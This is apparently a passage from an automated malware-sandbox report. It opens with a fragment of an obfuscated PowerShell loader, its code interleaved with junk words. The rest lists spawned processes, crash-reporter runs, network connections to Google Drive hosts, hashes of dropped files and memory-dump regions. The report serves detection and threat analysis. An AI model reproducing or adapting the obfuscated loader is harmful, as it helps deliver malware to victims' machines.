Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4384 -ip 4384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2632
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.135.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 6fa3bc0693f9b25f755076e62bd16488 |
| SHA1 | d77b88b84c54212206c1bb64b53030b72a090b46 |
| SHA256 | 77440d6aa22f460064cdbe56994ea71dfe93ab1db91ec5129095d84a4ccfeaf7 |
| SHA512 | 25e75355d43215518d3f95944d68ac515170a1360cd0ef75cb3cfffb94c0b85749917e219c039fb35a81789f1fcb245e4f9f3172295c65b936abd64e23240d3f |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 66dbe46189a99a73b9346672d34c3138 |
| SHA1 | 2818445ada528c9fd9c04c95369039adde8f6708 |
| SHA256 | 44446099d2fb29ec6c60d5ab1490eeb9f0a35b1e620342c2fb3ea49354bcc61f |
| SHA512 | b11b12e3859b2092ea8455af5de1e0e15210325e0ad8bd6a51ef6d1cb0f3925480e73342e1c41320060bbf38adea1e6f135628c8087a6c05b37c0330c1fed6ac |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 431dee567c8386cb30dba8162227f153 |
| SHA1 | 819be3b532ceb44a8f39a795494f822e61c76ec8 |
| SHA256 | 9d6611a404f78948afd12a529462e776b597216139365b3a3f0c0c765e03ff7b |
| SHA512 | e33ebdf090896fd82ad1f9f40ba99af5c5dc60763c0e64278dc0b2a94df31ccf326ff51553bd905caf35354968cec268fe2f0022ccaf650061e8dc504113cdc5 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | d66a3ee0adf3cab478770229c65f1325 |
| SHA1 | 7a346f32392b488ff8ffe1e04b418162ee122f69 |
| SHA256 | aeaf13cb0a80ec05e8aebd26fd84b6c14ee6339dcc6012ffae69b0ac9b483d83 |
| SHA512 | f38ffb82f54a2d1fd6d833358361879395d0f02860754e1c2dc3bf70d8f572a0a1d757accdd5622071498da32ee2195b57d3c4bba97cd39ce2a8ae86e5e37d07 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 574c55c3664ae5736b02b985575ef8fd |
| SHA1 | d6a5ae6ec2186d56e429f0d6d9a820a64ea2e5bd |
| SHA256 | 4187466f21a6a3c69282e6bf476b5d33b13304b7a60f724cc5b0bbb5d0c0aed1 |
| SHA512 | 0e03f11815aa0118369b9f33aea1ba65887130cdc7e7dbd819c4949d0dc38e3a3734395c10f491c25efd7007e80ea205c1944f352e8339ffc46543c9e42468d3 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 41077e923293898955e78267b7878339 |
| SHA1 | 36083128a00b83103bfe8bc36b0042ff6a703012 |
| SHA256 | 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0 |
| SHA512 | 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | a45ba0d9e34080482621cd2538f9b4f8 |
| SHA1 | d76f3ecbe487e2a2ce081d59966b546811e517dc |
| SHA256 | 3f76198c3a8aa09768b853a462a13de2c4302761f0c2d34de5f761e59033f471 |
| SHA512 | a7da77f44be0a7ac8834551b9d3133eb46b65489a1d55df69a3e7039dafcc65d36aeaf5c9efdef4acbe454a852c6c377071c3ce84f47cbdd38eece2d776d8d16 |
memory/2364-281-0x000001B42A6F0000-0x000001B42A712000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmtcztfo.v2b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2364-291-0x00007FFEE7340000-0x00007FFEE7E01000-memory.dmp
memory/2364-293-0x000001B429E30000-0x000001B429E40000-memory.dmp
memory/2364-292-0x000001B429E30000-0x000001B429E40000-memory.dmp
memory/2364-294-0x000001B42AB90000-0x000001B42ABB6000-memory.dmp
memory/2364-295-0x000001B42AC30000-0x000001B42AC44000-memory.dmp
memory/2364-296-0x000001B429E30000-0x000001B429E40000-memory.dmp
memory/4384-297-0x0000000002150000-0x0000000002186000-memory.dmp
memory/4384-298-0x0000000074DB0000-0x0000000075560000-memory.dmp
memory/4384-299-0x00000000047A0000-0x00000000047B0000-memory.dmp
memory/4384-300-0x0000000004DE0000-0x0000000005408000-memory.dmp
memory/4384-301-0x0000000004BA0000-0x0000000004BC2000-memory.dmp
memory/4384-302-0x0000000004C50000-0x0000000004CB6000-memory.dmp
memory/4384-303-0x0000000004CC0000-0x0000000004D26000-memory.dmp
memory/4384-313-0x0000000005450000-0x00000000057A4000-memory.dmp
memory/4384-314-0x0000000005A90000-0x0000000005AAE000-memory.dmp
memory/4384-315-0x0000000005AB0000-0x0000000005AFC000-memory.dmp
memory/4384-316-0x0000000007310000-0x000000000798A000-memory.dmp
memory/4384-317-0x0000000006060000-0x000000000607A000-memory.dmp
memory/4384-319-0x0000000006C90000-0x0000000006CB2000-memory.dmp
memory/4384-318-0x0000000006D30000-0x0000000006DC6000-memory.dmp
memory/4384-320-0x0000000007F40000-0x00000000084E4000-memory.dmp
memory/4384-321-0x0000000006D00000-0x0000000006D22000-memory.dmp
memory/4384-322-0x0000000006F60000-0x0000000006F74000-memory.dmp
memory/4384-323-0x0000000074DB0000-0x0000000075560000-memory.dmp
memory/2364-326-0x00007FFEE7340000-0x00007FFEE7E01000-memory.dmp